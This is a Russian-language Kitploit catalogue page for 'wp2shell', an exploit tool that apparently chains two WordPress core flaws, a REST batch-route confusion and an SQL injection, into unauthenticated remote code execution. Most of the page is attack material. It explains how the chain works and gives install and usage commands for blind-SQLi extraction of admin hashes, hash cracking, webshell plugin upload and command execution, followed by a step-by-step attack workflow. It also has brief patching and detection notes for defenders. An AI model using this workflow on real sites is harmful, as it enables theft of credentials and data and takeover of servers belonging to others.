Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
wp2shell — CVE-2026-63030 (RCE) + CVE-2026-60137 (SQLi) | Kitploit
Инструменты/GitHubGitHub/ekomssavior/wp2shell
Взлом паролейГенерация полезной нагрузкиАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийСбор информацииТестирование на ПроникновениеRed Teaming
GitHubekomssavior/wp2shell

wp2shell

CVE-2026-63030 (RCE) + CVE-2026-60137 (SQLi)

Репозиторий
821 месяц назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

wp2shell от: ek0ms savi0r

Неаутентифицированное удаленное выполнение кода для WordPress Core POC (CVE-2026-63030 + CVE-2026-60137)

Эксплойт wp2shell для критической цепочки уязвимостей в ядре WordPress. Он объединяет ошибку путаницы пакетных маршрутов REST API с SQL-инъекцией в WP_Query для достижения неаутентифицированного удаленного выполнения кода на уязвимых установках WordPress.

ДетальИнформация
CVECVE-2026-63030 (путаница пакетных маршрутов REST) + CVE-2026-60137 (SQLi author__not_in)
Затронутые версииWordPress 6.9.0 – 6.9.4, 7.0.0 – 7.0.1
Исправлено в6.9.5, 7.0.2
Требуется аутентификацияНет — неаутентифицированный
CVSSКритическая (цепочка RCE)
ОбнаруженоAdam Kues (Assetnote / Searchlight Cyber)
ЗависимостиPython 3.8+ — только стандартная библиотека

Как это работает

Эксплойт объединяет две ошибки в ядре WordPress:

  1. CVE-2026-60137 — SQL-инъекция – Когда author__not_in передается как строка вместо массива, WordPress пропускает проверку is_array() и подставляет необработанное значение в SQL-условие NOT IN (...).

  2. CVE-2026-63030 — Путаница пакетных маршрутов – Конечная точка /wp-json/batch/v1 создает параллельные массивы $matches и $validation. Поврежденный подзапрос добавляется в $validation, но не в $matches, что вызывает сдвиг индекса на +1. Подзапрос i отправляется с обработчиком подзапроса i+1.

Вместе: Запрос POST /wp/v2/posts, содержащий внутренний запрос GET /wp/v2/users со строкой author_exclude, обходит как белый список методов, так и санитацию ввода. Строка попадает в WP_Query как author__not_in и вставляется в SQL — предоставляя неаутентифицированную слепую SQL-инъекцию.

После этого инструмент может:

  • Извлечь хеш пароля администратора
  • Аутентифицироваться как администратор (после взлома хеша)
  • Загрузить вредоносный плагин
  • Выполнить произвольные системные команды

Возможности


Установка

root@kitploit:~
git clone https://github.com/ekomsSavior/wp2shell.git
cd wp2shell
chmod +x wp2shell.py

Всё. Сторонние пакеты не требуются.


Использование

root@kitploit:~
./wp2shell.py <url> [command] [options]

Интерактивный режим (меню)

root@kitploit:~
./wp2shell.py http://target.com

Запускает интерактивное меню со всеми функциями, доступными через пронумерованные опции.

Команды

check — Подтверждение уязвимости (безопасно)

Выполняет зонд с временной задержкой для подтверждения эксплуатабельности. Не читает данные и ничего не меняет.

root@kitploit:~
./wp2shell.py http://target.com check

read — Извлечение данных (слепая SQL-инъекция)

Извлекает информацию из базы данных с помощью временной слепой SQL-инъекции.

root@kitploit:~
# Server fingerprint (version, database, user)
./wp2shell.py http://target.com read

# Extract user logins and password hashes
./wp2shell.py http://target.com read --users

# Extract database name
./wp2shell.py http://target.com read --database

# Extract MySQL version
./wp2shell.py http://target.com read --version

# Custom SQL query
./wp2shell.py http://target.com read --query "SELECT @@version"

shell — Удаленное выполнение кода

Требуются действительные учетные данные администратора. SQL-инъекция может восстановить хеш пароля, но вы должны предоставить восстановленный пароль в открытом виде.

root@kitploit:~
# Execute a single command
./wp2shell.py http://target.com shell --user admin --password 'recovered_pass' --cmd "id"

# Execute a single command (short form)
./wp2shell.py http://target.com shell --user admin --password 'recovered_pass' --cmd whoami

Параметры


Пример рабочего процесса

root@kitploit:~
# 1. Check if the target is vulnerable
./wp2shell.py https://example.com check

# 2. Extract admin password hashes
./wp2shell.py https://example.com read --users

# 3. Crack the hash offline (using hashcat, john, etc.)
# hashcat -m 400 <hash> /path/to/wordlist.txt

# 4. Execute a command with the recovered password
./wp2shell.py https://example.com shell --user admin --password 'cracked_pass' --cmd "id"

Затронутые версии

ВетвьЗатронутыеИсправлено в
6.9.x6.9.0 – 6.9.46.9.5
7.0.x7.0.0 – 7.0.17.0.2
6.8.x6.8.0 – 6.8.5 (только SQLi, без RCE)6.8.6

Версии до 6.9.0 не затронуты полной цепочкой RCE.


Обнаружение и смягчение

Для защитников:

  • Немедленно обновитесь до 6.9.5, 7.0.2 или новее
  • Клиенты Cloudflare WAF автоматически защищены
  • Клиенты Wordfence имеют правила брандмауэра
  • Отслеживайте запросы POST /wp-json/batch/v1 с вложенными телами requests
  • Код 404 на пакетном маршруте не всегда означает 'исправлено' — это также может означать, что WAF/CDN блокирует анонимный доступ к REST API.

Правовое предупреждение

Этот инструмент предназначен только для образовательных и авторизованных целей тестирования безопасности.


Авторы

  • Обнаружение: Adam Kues (Assetnote / Searchlight Cyber)
  • CVE-2026-60137 (SQL-инъекция): TF1T, dtro, haongo
  • CVE-2026-63030 (Путаница пакетных маршрутов): Adam Kues

Для получения более подробной информации об уязвимости см. блог исследований Searchlight Cyber.

Скачать инструмент
ВозможностьОписание
Проверка уязвимостиБезопасный зонд с временной задержкой — не читает данные, ничего не меняет
Извлечение данныхСлепая SQL-инъекция с оптимизацией бинарного поиска для эффективного извлечения
Дамп хешей пользователейИзвлечение хешей user_login и user_pass из wp_users
Удаленное выполнение кодаАутентификация как администратор, загрузка плагина-веб-шелла, выполнение команд
Интерактивная оболочкаПостоянная сессия выполнения команд
Цветной выводЧеткая визуальная обратная связь результатов сканирования
Нет зависимостейИспользует только стандартную библиотеку Python
ПараметрОписание
--usersИзвлечение user_login и user_pass из wp_users
--databaseИзвлечение имени текущей базы данных
--versionИзвлечение версии MySQL
--query "SQL"Выполнение пользовательского SQL-запроса (слепое извлечение)
--user USERИмя пользователя администратора для RCE
--password PASSПароль администратора для RCE (открытый текст, восстановлен через SQLi)
--cmd CMDКоманда для выполнения через веб-шелл